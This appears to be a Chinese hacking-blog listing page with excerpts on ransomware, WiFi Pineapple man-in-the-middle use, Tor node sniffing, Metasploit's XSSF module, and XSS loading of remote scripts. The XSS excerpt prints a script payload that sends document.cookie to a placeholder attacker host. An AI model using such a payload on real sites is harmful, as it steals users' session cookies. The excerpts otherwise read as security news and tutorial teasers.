-
悄悄的干活,打枪的不要!勒索+比特币挖矿木马
1千万英国用户被Cryptolocker勒索软件瞄准 英国NCA向公众发出警告:CryptoLocker恶意程序肆虐网络 如何保护你的计算机不被恶意软件勒索 气焰嚣张勒索木马:打劫你没商量 地下论坛惊见全新档案加密勒索软件PowerLocker Emsisoft团队最近发现了一款名为”Linkup”的木马...作者:J0s1ph | 分类:黑客攻防 | 围观:254次发表评论
-
简单使用wifipineapple进行中间人劫持(MITM)
我们这次就说说wifipineapple,以下简称菠萝,菠萝已经出第五版了,笔者在这里使用的第四版。 首先需要了解菠萝是一个基于openwrt的设备,所以说,openwrt的功能,菠萝也一一具备。关于菠萝的历史,大家可以读读radiowar的文章,这里不再赘述。 菠萝的基本配置: 这部分网上都有,比较...作者:J0s1ph | 分类:黑客攻防 | 围观:239次
-
俄罗斯黑客入侵Tor节点监听流量
如今俄罗斯黑客,通过入侵Tor匿名网络的一些边缘节点,便可以监听到用户的数据流量。他们对facebook相关的流量数据格外感兴趣。 Tor是一个可以让你匿名上网的免费软件,它把请求加密并在大量计算机之间传送之后,再通过出口节点解密请求并发送到目标地址,通常这些出口节点有上千个之...作者:J0s1ph | 分类:黑客攻防 | 围观:190次
-
为Metasploit添加XSSF模块
在看《Metasploit渗透测试魔鬼训练营》的时候讲的XSSF模块的使用,感觉这个模块很神奇,原理虽然不知道但是觉得应该让大家的Metasploit都添加上这个模块,以备不时之需,本文目的仅仅是分享一下XSSF这个工具的安装和使用方法。 KALI Llinux安装方法: 安装最新的KALI Linux,现在是v1.0...作者:J0s1ph | 分类:黑客攻防 | 围观:262次
-
xss如何加载远程js的一些tips
在早期 , 对于xss我们是这样利用的 <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 将 cookie之类的数据传递到自己的服务端 但是 如果要更为复杂的攻击的话,由于字符串长度等限制 需要加载远程js来实现。 一个简单的例子 <script s...作者:J0s1ph | 分类:黑客攻防 | 围观:187次